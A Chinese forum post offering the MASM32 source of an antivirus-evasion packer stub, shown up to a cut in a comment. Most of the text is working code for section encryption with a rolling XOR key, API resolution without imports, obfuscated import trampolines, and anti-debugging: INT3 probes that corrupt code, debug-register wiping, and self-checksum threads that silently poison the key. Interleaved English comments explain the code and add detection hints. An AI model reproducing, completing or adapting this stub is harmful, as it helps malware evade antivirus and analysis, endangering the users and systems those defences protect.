想要一个自己个性的免杀工具吗??
【原创】:想要一个自己个性的免杀工具吗??【工具:Masm32】
特别声明:看不懂的不要回帖,论坛空间宝贵。
-----------------------------
.586
.model flat, stdcall
option casemap:none
;以下三行根据实际情况输入绝对路径
include windows.inc
include kernel32.inc
includelib kernel32.lib
set_seh proto :dword,:dword
.data
wsock32 db 'wsock32.dll',0
fname1 db 264 dup (?)
fname2 db 264 dup (?)
fname3 db 264 dup (?)
hfile1 dd ?
hfile2 dd ?
hfile3 dd ?
fsize1 dd ?
fsize2 dd ?
pt1 dd ?
pt2 dd ?
temp1 dd ?
mbi MEMORY_BASIC_INFORMATION <>
db 4 dup (?)
mbi2 MEMORY_BASIC_INFORMATION <>
comctl32 db 'comctl32.dll',0
ole32 db 'ole32.dll',0
oo db 'OleUninitialize',0
shell32 db 'shell32.dll',0
flag_add_section dd 1
flag_clear_boundimport dd 1
flag_clear_load_config dd 1
.code
entry: ;!!! 这个;!!!作为加花指令的标志,花指令生成程序遇到第奇数个;!!!即开始加花,偶数个停止加花
jmp _entry
flag_reentry db 0
; check_int3 -- inline anti-breakpoint probe, expanded inside procs that run with an EBP frame.
; Reads the dword at [ebp+4] (the return address under a standard push ebp / mov ebp,esp
; frame) and tests whether the byte stored there is 0CCh, the one-byte INT3 opcode that
; debuggers plant for software breakpoints. When it is, a dword taken from RDTSC is written
; at a timer-derived offset (0..255) past that address, i.e. into the caller's code.
; Preserves: flags and eax (pushf/push eax ... pop eax/popf); esi and edx on the write path.
; Analysis note: behaviour of the sample changes when a software breakpoint sits on the
; instruction that follows a call into a proc using this macro.
check_int3 macro
pushf
push eax
mov eax,[ebp+4]            ; return address, assuming the standard EBP frame
cmp byte ptr [eax],0cch    ; 0CCh = INT3
jne @f
; breakpoint byte found: corrupt code near the return address
push esi
push edx
xchg eax,esi               ; esi = address that was probed
rdtsc                      ; edx:eax = timestamp counter
add edx,eax
and edx,000000ffh          ; offset limited to 0..255
mov [esi+edx],eax          ; 4-byte write of timer data
pop edx
pop esi
@@:
pop eax
popf
endm
; check_int3_0 -- same probe as check_int3, for expansion sites that have no EBP frame.
; It builds a temporary frame itself, so [ebp+4] is the dword that was on top of the stack
; when the macro began. In get_knl_base and move_memory the macro is expanded before any
; push in a frameless proc, so that dword is the return address there.
; Preserves: ebp, flags and eax; esi and edx on the write path.
check_int3_0 macro
push ebp
mov ebp,esp
pushf
push eax
mov eax,[ebp+4]            ; dword that was at [esp] on entry to the macro
cmp byte ptr [eax],0cch    ; 0CCh = INT3, software-breakpoint opcode
jne @f
; breakpoint byte found: overwrite bytes near that address with timer data
push esi
push edx
xchg eax,esi
rdtsc
add edx,eax
and edx,000000ffh          ; offset limited to 0..255
mov [esi+edx],eax
pop edx
pop esi
@@:
pop eax
popf
pop ebp
endm
check1_start label byte
_entry:
pushfd
pushad
call entry0 ;!!!
entry0: ;!!!
pop ebx
sub ebx,offset entry0
cmp flag_reentry[ebx],0
jne entry00
lea esi,entry00[ebx]
mov ecx,__ok - entry00
@@:
not byte ptr [esi]
inc esi
loop @b
mov flag_reentry[ebx],1
entry00:
jmp entry1
; get_knl_base -- find a loaded module's base address without calling any API.
; In:    nothing (reads the current thread's SEH chain through fs:[0])
; Out:   eax = first 64 KB-aligned address, at or below the last SEH handler, that starts
;        with 'MZ' and whose e_lfanew points at a 'PE',0,0 signature
; Saves: edx (push/pop); flags are modified
; NOTE(review): the author treats that module as kernel32.dll. Nothing here checks the
; module name, so this depends on which module hosts the final handler -- confirm per OS.
; The downward scan dereferences each 64 KB step without checking that it is readable.
; Analysis note: SEH-chain walking plus an MZ/PE scan, in place of an import-table
; reference, is a common trait of position-independent packer and loader stubs.
get_knl_base proc ;get the kernel32.dll base address
assume fs:nothing
mov eax,fs:[0]              ; head of the SEH registration chain
check_int3_0
push edx
@@:
cmp dword ptr [eax],-1      ; Next == -1 marks the last record
je @f
mov eax,[eax]
jmp @b
@@:
mov eax,[eax+4]             ; handler address stored in the last record
and eax,0ffff0000h          ; round down to a 64 KB boundary
@@1:
cmp word ptr [eax],'ZM'     ; bytes 'M','Z' in memory
je @f
sub eax,10000h              ; step down 64 KB and retry
jmp @@1
@@:
mov edx,[eax+3ch]           ; e_lfanew
add edx,eax
cmp dword ptr [edx],00004550h ; 'PE',0,0
je @f
sub eax,10000h
jmp @@1
@@:
pop edx
ret
get_knl_base endp
;tt1 db '1',0
;tt2 db '2',0
;tt3 db '3',0
;tt4 db '4',0
;disp proc uses eax ecx edx
; pushf
; cmp check1[ebx],0
; je @f
; lea edx,tt1[ebx]
; jmp dp5
;@@:
; cmp check2[ebx],0
; je @f
; lea edx,tt2[ebx]
; jmp dp5
;@@:
;
; jmp dp9
;
; cmp hEvent[ebx],0
; je @f
; lea edx,tt3[ebx]
; jmp dp5
;@@:
; cmp hEvent1[ebx],0
; jne @f
; lea edx,tt4[ebx]
; jmp dp5
;@@:
; jmp dp9
;dp5:
; push MB_OK
; push edx
; push edx
; push 0
; call f_MessageBox[ebx]
;dp9:
; popf
; ret
;disp endp
;disp1 proc uses eax ecx edx
; pushf
; lea eax,ttt[ebx]
; push MB_OK
; push eax
; push eax
; push 0
; call f_MessageBox[ebx]
; popf
; ret
;disp1 endp
;
; check_thread -- worker thread that checksums the stub's own code and folds any mismatch
; into the values later used for decryption (check1, check2, decode_key).
; In:    para = load delta (runtime address minus link-time address), kept in ebx
; Flags: runs while bit 0 of flag_thread_end is clear; works only while bit 0 of
;        flag_thread_active is set; sets bit 0 of flag_thread_finish after each pass and
;        bit 0 of flag_thread_exit on the way out.
; Region 1 (check1_start..check1_end) uses a negated byte sum, region 2
; (check2_start..check2_end) a plain byte sum; the expected values are check1_sum and
; check2_sum. With unmodified code the differences are 0 and nothing changes.
; "int 0f7h" is a deliberate exception: seh1, installed below, resumes two bytes later
; with eax = Dr0+Dr1+Dr2+Dr3 of this thread and those registers cleared.
; Analysis note: patching or software-breakpointing either region, or holding hardware
; breakpoints in this thread, silently changes the key instead of raising an error.
; The wait loops spin without sleeping, which shows up as a busy thread.
check_thread proc para
mov ebx,para
lea eax,seh1[ebx]
invoke set_seh,1,eax
ct0:
@@:
test flag_thread_end[ebx],1
jnz ct9
test flag_thread_active[ebx],1
jz @b
;;; jmp ct30 ;;;;;;;;;;;;;
lea esi,check1_start[ebx]
lea edi,check1_end[ebx]
mov eax,0
mov ecx,0
@@:
mov cl,[esi]
sub eax,ecx                 ; eax = -(sum of bytes)
inc esi
cmp esi,edi
jb @b
ct2 label byte
sub eax,check1_sum[ebx]     ; 0 when region 1 is unmodified
add check1[ebx],eax
add decode_key[ebx],eax
xor eax,'jdsg'
int 0f7h                    ; eax replaced by the debug-register sum (see seh1)
add check1[ebx],eax
test flag_thread_finish[ebx],10b
jz ct3                      ; region 2 is checked only once bit 1 of flag_thread_finish is set
lea esi,check2_start[ebx]
lea edi,check2_end[ebx]
mov eax,0
mov ecx,0
@@:
mov cl,[esi]
add eax,ecx                 ; eax = sum of bytes
inc esi
cmp esi,edi
jb @b
ct21 label byte
sub eax,check2_sum[ebx]     ; 0 when region 2 is unmodified
xor check2[ebx],eax
xor decode_key[ebx],eax
sub eax,'jkdf'
int 0f7h                    ; eax replaced by the debug-register sum
xor check2[ebx],eax
ct30:
or flag_thread_finish[ebx],1
ct3:
; call disp ;;;;;;;;;;;;;;;
jmp ct0
ct9:
and flag_thread_active[ebx],0fffffffeh
invoke set_seh,0,0
or flag_thread_exit[ebx],1
ret
check_thread endp
; get_func_address -- hand-written export resolver: walks the PE export directory of an
; already-mapped module, so the stub needs no import-table entry for the APIs it uses.
; In:    base       = module base address
;        p_funcname = pointer to a NUL-terminated export name, or an ordinal with bit 31 set
;        ebx        = load delta, saved in save_ebx and used to reach the stub's own data
; Out:   eax = resolved address; 0 when the ordinal is out of range or the name is absent
; Forwarders: the bytes at the resolved address are compared, case-folded, with each
; "NAME." prefix from forwardchain_dll. On a match the text is treated as a forwarder
; string "DLL.Function": the DLL is loaded once through f_LoadLibrary (handle cached in
; forwardchain_handle) and the lookup restarts at gfa1 with the new base and name.
; check1 and check2 are added to pointers on the way. Both start at 0 in this file and
; are written only by the checking threads, so a detection there derails resolution here.
; Analysis note: resolved addresses exist only at run time; static import listings of a
; protected file will not show these APIs.
get_func_address proc stdcall uses ebx ecx edx esi edi base,p_funcname
local save_ebx:dword
mov save_ebx,ebx
gfa1:
mov ebx,base
mov eax,[ebx+3ch] ;e_lfanew -> 'PE' header
mov eax,[ebx+eax+78h] ;export directory RVA
test p_funcname,80000000h   ; bit 31 set = lookup by ordinal
je gfa5
mov esi,[ebx+eax+24h] ;AddressOfNameOrdinals
mov edx,[ebx+eax+14h] ;NumberOfFunctions
mov ecx,p_funcname
and ecx,7fffffffh
sub ecx,[ebx+eax+10h]       ; subtract the ordinal Base
cmp ecx,edx
jae @@90                    ; index outside the function table: return 0
add ecx,ecx
add ecx,ecx                 ; index * 4
mov edi,ecx
add edi,[ebx+eax+1ch]       ; AddressOfFunctions
mov eax,[ebx+edi]
add eax,ebx                 ; RVA -> address
jmp gfa6
gfa5:
cmp ebx,p_funcname
ja @f
;;; mov eax,p_funcname
;;; jmp @@9
@@:
mov esi,[ebx+eax+20h] ;AddressOfNames
mov edx,[ebx+eax+18h] ;NumberOfNames
push eax                    ; keep the export directory RVA for @@1
@@0:
mov ecx,p_funcname
mov edi,[esi+ebx]           ; RVA of the next export name
@@:
; byte-wise string compare of the export name against p_funcname
mov al,[edi+ebx]
cmp al,[ecx]
jne @f
cmp al,0
je @@1                      ; both strings ended together: match
inc edi
inc ecx
jmp @b
@@:
add esi,4
dec edx
jnz @@0
mov eax,0                   ; name not exported by this module
jmp @@9
@@1:
pop eax ;export directory RVA
sub esi,[ebx+eax+20h]       ; esi = 4 * index of the matching name
shr esi,1                   ; 2 * index (ordinal entries are words)
add esi,[ebx+eax+24h] ;AddressOfNameOrdinals
movzx esi,word ptr [ebx+esi]
shl esi,2
add esi,[ebx+eax+1ch] ;AddressOfFunctions
mov eax,[ebx+esi]
add eax,ebx
gfa6:
mov ebx,save_ebx
check_int3
lea edx,forwardchain_dll[ebx]
lea edi,forwardchain_handle[ebx]
add eax,check2[ebx]
gfa70:
mov esi,[edx]               ; link-time pointer to the next DLL name; 0 ends the list
cmp esi,0
je @@9                      ; no forwarder prefix matched: eax is the result
add esi,ebx
push eax
push esi
dec esi
dec eax
gfa7:
inc eax
inc esi
mov cl,[eax]
cmp cl,'a'
jb @f
cmp cl,'z'
ja @f
and cl,0dfh                 ; fold a..z to upper case
@@:
cmp cl,[esi]
jne @f
cmp cl,'.'
je gfa75                    ; matched up to and including the '.'
jmp gfa7
@@:
pop esi
pop eax
add edx,4
add edi,4
jmp gfa70
gfa75:
pop esi
cmp dword ptr [edi],0       ; module handle already cached?
jne @f
push eax
push esi
call f_LoadLibrary[ebx]
mov [edi],eax
pop eax
@@:
inc eax                     ; first character after the '.'
add eax,check1[ebx]
mov p_funcname,eax          ; forwarded function name
mov eax,[edi]
mov base,eax                ; continue in the forward target module
pop eax
mov ebx,save_ebx
jmp gfa1
@@90:
mov eax,0
@@9:
ret
get_func_address endp
; set_seh -- install (flag != 0) or remove (flag == 0) a structured exception handler for
; the current thread, using the caller's stack as storage for the registration record.
; In:    flag = non-zero to install, 0 to remove
;        ofs  = handler address when installing (ignored when removing)
; Out:   eax preserved (uses eax)
; Install: the flag slot is overwritten with the previous fs:[0], so the two argument
; dwords now form {Next, Handler}; fs:[0] is pointed at them and "ret 0" leaves them on
; the caller's stack.
; Remove: [ofs+4] is the dword just above this call's arguments, which is the Next field
; of the record left by the install call; it is written back to fs:[0] and "ret 4*4"
; drops both the two arguments and that record.
; NOTE(review): this pairing holds only when the caller's stack depth at the remove call
; equals its depth right after the install call -- confirm at each call site.
set_seh proc uses eax flag,ofs
assume fs:nothing
cmp flag,0
check_int3                  ; flags are preserved across the macro
je @f
mov eax,fs:[0]
mov flag,eax                ; record.Next = previous chain head
lea eax,flag
mov fs:[0],eax              ; chain head = record stored in the argument slots
jmp ss9
@@:
mov eax,[ofs+4]             ; Next field of the previously installed record
mov fs:[0],eax
ret 4*4
ss9:
ret 0
set_seh endp
; thread_control -- dispatcher thread that starts the three worker threads on request.
; In:    para = load delta, kept in ebx and passed on as each worker's parameter
; Loop:  for each set bit in flag_thread_create the same bit is cleared in
;        flag_thread_create, flag_thread_end and flag_thread_exit, then a thread is created:
;          bit 0 -> check_thread, bit 1 -> decode_thread, bit 2 -> checkAPI_thread
;        One request is served per pass; the loop does not sleep between passes.
; Exit:  when bit 31 of flag_thread_end is set; that bit is cleared and bit 31 of
;        flag_thread_exit is set as the acknowledgement.
; The CreateThread return value (thread handle) is neither checked nor closed.
thread_control proc para
mov ebx,para
;lea eax,ttt[ebx]
;push MB_OK
;push eax
;push eax
;push 0
;call f_MessageBox[ebx]
;int 3
tc00:
test flag_thread_end[ebx],80000000h
jnz tc9
tc0:
test flag_thread_create[ebx],1
je @f
and flag_thread_create[ebx],0fffffffeh
and flag_thread_end[ebx], 0fffffffeh
and flag_thread_exit[ebx], 0fffffffeh
lea edx,check_thread[ebx]
jmp tc1
@@:
test flag_thread_create[ebx],10b
je @f
and flag_thread_create[ebx],0fffffffdh
and flag_thread_end[ebx], 0fffffffdh
and flag_thread_exit[ebx], 0fffffffdh
lea edx,decode_thread[ebx]
jmp tc1
@@:
test flag_thread_create[ebx],100b
je @f
and flag_thread_create[ebx],0fffffffbh
and flag_thread_end[ebx], 0fffffffbh
and flag_thread_exit[ebx], 0fffffffbh
lea edx,checkAPI_thread[ebx]
jmp tc1
@@:
jmp tc8
tc1:
; CreateThread(NULL, 0, edx, ebx, 0, &threadID) through the resolved pointer
lea eax,threadID[ebx]
push eax
push 0
push ebx
push edx
push 0
push 0
call f_CreateThread[ebx]
tc8:
jmp tc00
tc9:
and flag_thread_end[ebx], 7fffffffh
or flag_thread_exit[ebx],80000000h
ret
thread_control endp
; seh1 -- exception handler that turns three deliberately faulting "int n" instructions
; into private service calls and tampers with the debug registers of the faulting thread.
; In:    standard SEH handler arguments (exception record, frame, context, dispatcher)
; Out:   eax = 0 (continue execution); CONTEXT.Eip is advanced by 2 on every path
; Dispatch on the two bytes found at ExceptionAddress:
;   CD F5 (int 0F5h): zero Dr0..Dr3 in the thread context
;   CD F6 (int 0F6h): pop one dword from the faulting thread's stack, start a thread at
;                     that address with the context's Ebx as parameter, then do CD F7
;   CD F7 (int 0F7h): context Eax = Dr0+Dr1+Dr2+Dr3, then zero Dr0..Dr3
;   anything else   : no register change, but execution still resumes 2 bytes further on
; Analysis note: hardware breakpoints are wiped each time one of these instructions runs,
; and a non-zero register sum is returned to callers that fold it into their keys.
; Handlers that write the Dr fields of a CONTEXT are a useful anti-debug indicator.
seh1 proc uses ebx ecx edx esi lpExceptionRecord,lpSEH,lpContext,lpDisp
mov ecx,lpExceptionRecord
assume ecx:ptr EXCEPTION_RECORD
mov edx,lpContext
assume edx:ptr CONTEXT
mov eax,[ecx].ExceptionAddress
mov ax,[eax]                ; first two opcode bytes of the faulting instruction
cmp ax,0f5cdh
je _f5cd
cmp ax,0f6cdh
je _f6cd
cmp ax,0f7cdh
je _f7cd
; the commented alternatives (return 1 via se91) would pass unknown exceptions on
mov eax,0 ;1
jmp se9 ;jmp se91
_f5cd:
mov eax,0
mov [edx].iDr0,eax
mov [edx].iDr1,eax
mov [edx].iDr2,eax
mov [edx].iDr3,eax
;;; mov [edx].iDr7,0 ;155h
jmp se9
_f6cd:
push ecx
push edx
mov eax,[edx].regEsp
mov esi,[eax]               ; thread start address pushed by the code that faulted
add [edx].regEsp,4          ; remove it from the faulting thread's stack
mov ebx,[edx].regEbx        ; load delta of the faulting code
; CreateThread(NULL, 0, esi, ebx, 0, &threadID)
lea eax,threadID[ebx]
push eax
push 0
push ebx
push esi
push 0
push 0
call f_CreateThread[ebx]
; push eax
; call f_ResumeThread[ebx]
pop edx
pop ecx
jmp _f7cd
_f7cd:
mov eax,0
add eax,[edx].iDr0
add eax,[edx].iDr1
add eax,[edx].iDr2
add eax,[edx].iDr3
mov [edx].regEax,eax        ; value seen in eax after the faulting instruction
mov eax,0
mov [edx].iDr0,eax
mov [edx].iDr1,eax
mov [edx].iDr2,eax
mov [edx].iDr3,eax
;;; mov [edx].iDr7,0 ;155h
jmp se9
se9:
add [edx].regEip,2          ; skip the two-byte instruction
mov eax,0
se91:
assume ecx:nothing
assume edx:nothing
ret
seh1 endp
;!!!
check1_end label byte
pi PROCESS_INFORMATION <>
_si STARTUPINFO <>
proc_exit_code dd ?
shell_eip dd ?
check1 dd 0
hModule dd ?
hProc dd ?
buf db 256 dup (?)
knl_base dd ?
p_funcs label byte
f_GetProcAddress dd ?
f_VirtualAlloc dd ?
f_VirtualProtect dd ?
f_CreateProcess dd ?
f_CreateEvent dd ?
f_OpenEvent dd ?
f_GetModuleHandle dd ?
f_WaitForSingleObject dd ?
f_GetModuleFileName dd ?
f_GetCommandLine dd ?
f_LoadLibrary dd ?
f_FreeLibrary dd ?
f_CloseHandle dd ?
f_ExitProcess dd ?
f_GetExitCodeProcess dd ?
f_GetLastError dd ?
f_VirtualQuery dd ?
f_UnmapViewOfFile dd ?
f_VirtualFree dd ?
f_VirtualProtectEx dd ?
f_CreateThread dd ?
f_ResumeThread dd ?
f_DisableThreadLibraryCalls dd ?
p_funcnames db 'GetProcAddress',0
db 'VirtualAlloc',0
p_vp db 'VirtualProtect',0
db 'CreateProcessA',0
db 'CreateEventA',0
db 'OpenEventA',0
db 'GetModuleHandleA',0
db 'WaitForSingleObject',0
db 'GetModuleFileNameA',0
db 'GetCommandLineA',0
p_ll db 'LoadLibraryA',0
db 'FreeLibrary',0
db 'CloseHandle',0
db 'ExitProcess',0
db 'GetExitCodeProcess',0
db 'GetLastError',0
db 'VirtualQuery',0
db 'UnmapViewOfFile',0
db 'VirtualFree',0
db 'VirtualProtectEx',0
db 'CreateThread',0
db 'ResumeThread',0
db 'DisableThreadLibraryCalls',0
db 0
event_name db 'jdsglxg',0
hNTDLL dd 0
ntdllname db 'ntdll.dll',0
p_getlasterror db 'RtlGetLastWin32Error',0
hEvent dd 0
oringal_proc_offs dd ?
decode_key dd ?
oringal_proc_size dd ?
old_protect_flag dd ?
check2 dd 0
iat_offs dd ?
iat_size dd ?
reloc_offs dd ?
reloc_size dd ?
image_base dd ?
hEvent1 dd 0
check2_sum dd ?
threadID dd ?
flag_thread_end dd 0
p_mem1 dd ?
p_mem2 dd ?
flag_thread_exit dd 0
temp dd ?
flag_thread_create dd 0
mbi1 MEMORY_BASIC_INFORMATION <>
dll_exitcode dd 0
iat_pt dd 0
flag_finish dd 0
exitcode dd 312321
msg db 'Are you sure ?',0
rnd dd ?
titl db '^_^',0
flag_thread_finish dd 0
user32name db 'user32.dll',0
hUser32 dd ?
iat_size0 dd 0
flag_thread_active dd 0
p_msgbox db 'MessageBoxA',0
f_MessageBox dd ?
decode_start dd ?
check1_sum dd ?
decode_end dd ?
number_of_section dd ?
ttt db 'xxx',0
rva_table dd 10h dup (0,0)
flag_encode label dword
export dd 1
import dd 1
res dd 0
exception dd 0
security dd 0
base_reloc dd 1
debug dd 0
copyright dd 0
globlptr dd 0
tls dd 0
loadconfig dd 0
bound_import dd 0
import1 dd 0
delay_import dd 0
dd 0
dd 0
forwardchain_dll dd kernel32,user32,gdi32,ntdll,advapi32,ws2_32,mswsock,shlwapi
dd 0
forwardchain_handle dd 0 ,0 ,0 ,0 ,0 ,0 ,0 ,0
dd 0
kernel32 db 'KERNEL32.dll',0
user32 db 'USER32.dll',0
gdi32 db 'GDI32.dll',0
ntdll db 'NTDLL.dll',0
advapi32 db 'ADVAPI32.dll',0
ws2_32 db 'WS2_32.dll',0
mswsock db 'MSWSOCK.dll',0
shlwapi db 'SHLWAPI',0
file_type db 1 ;1 - exe 2 - dll
data_size = $ - offset pi
check2_start label byte
entry1: ;!!!
cld
call get_knl_base
push eax
lea ecx,p_ll[ebx]
invoke get_func_address,eax,ecx
mov f_LoadLibrary[ebx],eax
pop eax
mov knl_base[ebx],eax
lea edi,p_funcnames[ebx]
lea esi,p_funcs[ebx]
@@:
cmp byte ptr [edi],0
je @f
mov eax,knl_base[ebx]
invoke get_func_address,eax,edi
mov [esi],eax
add esi,4
mov ecx,-1
mov al,0
repne scasb
je @b
@@:
lea eax,user32name[ebx]
push eax
call f_LoadLibrary[ebx]
mov hUser32[ebx],eax
lea ecx,p_msgbox[ebx]
invoke get_func_address,eax,ecx
mov f_MessageBox[ebx],eax
;;;mov check1[ebx],0
;call disp1
cmp file_type[ebx],1 ;exe
je is_exe
cmp file_type[ebx],2 ;dll
jne error_exit
cmp dword ptr [esp+24h+4+4],1 ;dll_process_attach
jne dll_ret
mov eax,[esp+24h+4+0]
mov hModule[ebx],eax
push eax
call f_DisableThreadLibraryCalls[ebx]
; call 校验dll
; cmp eax,正确值
jmp dll_ok ;;;je dll_ok
dll_error:
popad
popfd
mov eax,0
ret 3*4
dll_ok:
mov eax,exitcode[ebx]
mov dll_exitcode[ebx],eax
jmp exe_dll ;;;cc
dll_ret:
mov eax,dll_exitcode[ebx]
cmp eax,exitcode[ebx]
jne dll_error
cmp flag_finish[ebx],0
jne pe0
jmp dll_error
is_exe:
push 0
call f_GetModuleHandle[ebx]
mov hModule[ebx],eax
exe_dll:
lea eax,event_name[ebx]
push eax
push 0
push EVENT_ALL_ACCESS
call f_OpenEvent[ebx]
cmp eax,0
je firstrun
push eax
push eax
call f_CloseHandle[ebx]
pop hEvent1[ebx]
;call disp1
lea eax,seh1[ebx]
invoke set_seh,1,eax
int 0f5h ;clear DRx
lea eax,thread_control[ebx]
push eax
int 0f6h ;create control thread ,return:eax=DRx
or flag_thread_create[ebx],111b
lea eax,_ok[ebx]
mov decode_start[ebx],eax
or flag_thread_active[ebx],1 ;active check
lea eax,__ok[ebx]
mov decode_end[ebx],eax
not eax
int 0f7h ;Get and clear DRx
and flag_thread_finish[ebx],0fffffffdh
add decode_key[ebx],eax
or flag_thread_active[ebx],10b ;active decode
@@:
test flag_thread_finish[ebx],10b
int 0f7h
jz @b
jmp _ok
lea eax,second_entry[ebx]
mov dword ptr proc_ret_addr[ebx+1],eax
popad
popfd
proc_ret_addr label byte ;!!!
push 12345678h ;!!!
ret
; isnot? -- decide whether the position pt may be XOR-ed by encode/decode.
; In:    pt  = position to test, compared against the entries of rva_table
;        ebx = load delta (0 in the builder, where encode clears ebx first)
; Out:   ZF = 1 -> leave the dword at pt untouched
;        ZF = 0 -> process it
;        eax, ecx and edx are restored (uses); the result is carried only by the flag
; rva_table holds 16 {address, size} pairs and flag_encode one dword per pair. The first
; pair whose range [address-3, address+size) contains pt decides: ZF = 1 when its
; flag_encode entry is 0. The 3-byte margin keeps a 4-byte XOR that starts just below a
; protected range from running into it. No match in 16 entries gives ZF = 0.
isnot? proc stdcall uses eax ecx edx pt
mov ecx,0
mov edx,pt
check_int3
is0:
mov eax,dword ptr rva_table[ecx*8][ebx]
cmp eax,0
je is1                      ; empty entry
sub eax,3
cmp edx,eax
jb is1                      ; pt lies below address-3
add eax,dword ptr rva_table[ecx*8+4][ebx]
add eax,3                   ; eax = address + size
cmp edx,eax
jae is1                     ; pt lies at or above the end
cmp dword ptr flag_encode[ecx*4][ebx],0
jne is2                     ; this entry is marked as encodable
xor al,al                   ; ZF = 1: protected
jmp is9
is1:
inc ecx
cmp ecx,16
jb is0
is2:
or al,1                     ; ZF = 0
is9:
ret
isnot? endp
;!!!
; api1 / api2 / api3 -- templates for the small trampolines that proc_iat copies into
; allocated memory, one per imported function. Each computes its target from two 32-bit
; immediates (sub, xor or add) and transfers control with RET, so the import slot holds a
; trampoline address and not the API address.
; The api*_1 and api*_2 labels mark the two instructions whose immediates (at label+1)
; proc_iat overwrites; the constants assembled here are placeholders.
; NOTE(review): "mov [esp+6],eax" lands on the first pushed slot only if PUSHF assembles
; as a 16-bit push -- confirm against the assembler listing.
; Analysis note: the fixed shape push eax / pushf / push eax / mov eax,imm32 /
; op eax,imm32 / mov [esp+6],eax / pop eax / popf / ret is a stable pattern to search for
; in writable+executable private memory.
api1:
push eax                    ; reserve the slot that RET will consume
pushf
push eax                    ; save eax
api1_1 label byte
mov eax,87264981h
api1_2 label byte
sub eax,71526384h
mov [esp+6],eax             ; store the computed target into the reserved slot
pop eax
popf
ret
api1_len = $ - offset api1
api2:
push eax
pushf
push eax
api2_1 label byte
mov eax,41836496h
api2_2 label byte
xor eax,18932755h
mov [esp+6],eax
pop eax
popf
ret
api2_len = $ - offset api2
api3:
push eax
pushf
push eax
api3_1 label byte
mov eax,36384594h
api3_2 label byte
add eax,92837461h
mov [esp+6],eax
pop eax
popf
ret
api3_len = $ - offset api3
;!!!
; checkAPI_thread -- worker thread that looks for breakpoint bytes at the start of the
; APIs the stub depends on, and perturbs the key material when it finds one.
; In:    para = load delta, kept in ebx
; Loop:  until bit 2 of flag_thread_end is set. Each pass scans the first 10 bytes of
;        VirtualProtect, VirtualProtectEx, CreateThread, VirtualAlloc, LoadLibrary and
;        VirtualFree (resolved pointers) for the byte 0CCh.
;        none found -> bit 2 of flag_thread_finish is set, check1 ^= debug-register sum
;        found      -> check1, check2, decode_key and the immediates at dc_edit+1 and
;                      ec_edit+1 are changed, so later decryption yields garbage
; Exit:  removes the handler and sets bit 2 of flag_thread_exit.
; The scan is a raw byte search, not a disassembly: a 0CCh that is part of an operand or
; of padding inside those 10 bytes counts as a hit as well.
checkAPI_thread proc para
mov ebx,para
lea eax,seh1[ebx]
invoke set_seh,1,eax
ca0:
test flag_thread_end[ebx],100b
jnz ca9
cld
ca1:
mov eax,ebx
not eax
int 0f7h                    ; seh1 returns Dr0+Dr1+Dr2+Dr3 in eax and clears them
add check2[ebx],eax
xchg esi,eax                ; esi = debug-register sum
mov al,0cch                 ; byte to search for: INT3
mov edi,f_VirtualProtect[ebx]
mov ecx,10
repne scasb
je ca5
mov edi,f_VirtualProtectEx[ebx]
mov ecx,10
repne scasb
je ca5
mov edi,f_CreateThread[ebx]
mov ecx,10
repne scasb
je ca5
mov edi,f_VirtualAlloc[ebx]
mov ecx,10
repne scasb
je ca5
mov edi,f_LoadLibrary[ebx]
mov ecx,10
repne scasb
je ca5
mov edi,f_VirtualFree[ebx]
mov ecx,10
repne scasb
je ca5
or flag_thread_finish[ebx],100b
xor check1[ebx],esi
jmp ca6
ca5:
; a 0CCh byte was found: poison everything the decryption depends on
sub check1[ebx],eax
inc dword ptr dc_edit+1
inc dword ptr ec_edit+1
add check2[ebx],eax
inc decode_key[ebx]
; lea eax,ttt[ebx]
; push MB_OK
; push eax
; push eax
; push 0
; call f_MessageBox[ebx]
ca6:
jmp ca0
ca9:
invoke set_seh,0,0
or flag_thread_exit[ebx],100b
ret
checkAPI_thread endp
; decode -- run-time inverse of encode: XOR a region with a rolling 32-bit key.
; In:    p_offs = start position of the region, in the units isnot? compares against
;        p_size = region size in bytes (regions shorter than 4 bytes are skipped)
;        base   = address added to every position to reach the bytes
;        xz     = adjustment added to positions before use (0 at the call in this file)
;        ebx    = load delta (needed by isnot? and check_int3's frame)
; Out:   eax = key value after the last step; esi, ecx, edx and edi are restored (uses)
; For each of the p_size-3 byte positions that isnot? does not protect, the dword at that
; position is XOR-ed with the key and the key grows by 7. Neighbouring dwords overlap, so
; the result depends on processing order. The key starts from the immediate at dc_edit+1,
; which other code in this file rewrites before and during execution.
; Analysis note: reproducing this loop with the final dc_edit value is what an unpacker
; for protected samples needs; the push/mov eax,-1/mov edi,eax/pop sequence has no effect
; on the result.
decode proc stdcall uses esi ecx edx edi p_offs,p_size,base,xz
; ret
dc0:
mov ecx,p_size
cmp ecx,4
jb dc9
sub ecx,3                   ; last position that still has 4 bytes behind it
mov esi,p_offs
add esi,xz
check_int3
mov edx,base
dc_edit label byte ;!!!
mov eax,'jdsg' ;!!!
dc1:
sub esi,xz                  ; isnot? expects the unadjusted position
invoke isnot?,esi
pushf                       ; keep ZF across the add
add esi,xz
popf
jz @f                       ; protected position: skip
push eax
mov eax,-1
;int 0f7h
mov edi,eax
pop eax
xor [esi+edx],eax
; ror eax,7
add eax,7
;xor [esi+edx],edi
@@:
inc esi
loop dc1
dc9:
ret
decode endp
; encode -- build-time counterpart of decode: XOR a section of the input file, as loaded
; into the builder's buffer, with a rolling 32-bit key.
; In:    p_offs = start position of the region (the caller passes the section's virtual
;                 address field)
;        p_size = region size in bytes (regions shorter than 4 bytes are skipped)
;        base   = address of the file buffer
;        xz     = value added to positions to reach file offsets (the caller passes
;                 raw-data pointer minus virtual address)
; Out:   eax = key value after the last step; ebx, esi, ecx and edx are restored (uses)
; ebx is cleared first so that isnot? reads rva_table and flag_encode at their link-time
; addresses. Positions protected by isnot? are skipped and do not advance the key. The
; key starts from the immediate at ec_edit+1, which the builder overwrites before use.
encode proc stdcall uses ebx esi ecx edx p_offs,p_size,base,xz
; ret
mov ebx,0
mov ecx,p_size
cmp ecx,4
jb ec9
sub ecx,3                   ; last position that still has 4 bytes behind it
mov esi,p_offs
add esi,xz
mov edx,base
ec_edit label byte ;!!!
mov eax,'jdsg' ;!!!
ec1:
sub esi,xz                  ; isnot? expects the unadjusted position
invoke isnot?,esi
pushf                       ; keep ZF across the add
add esi,xz
popf
jz @f                       ; protected position: skip
xor [esi+edx],eax
; ror eax,7
add eax,7
@@:
inc esi
loop ec1
ec9:
ret
encode endp
; move_memory -- overlap-safe byte copy (memmove semantics) with register arguments.
; In:    esi = source, edi = destination, ecx = byte count
; Out:   nothing; esi, edi and ecx are consumed
; Returns at once when the count is 0 or source equals destination. When the source lies
; below the destination the copy runs backwards (std) from the last byte, so overlapping
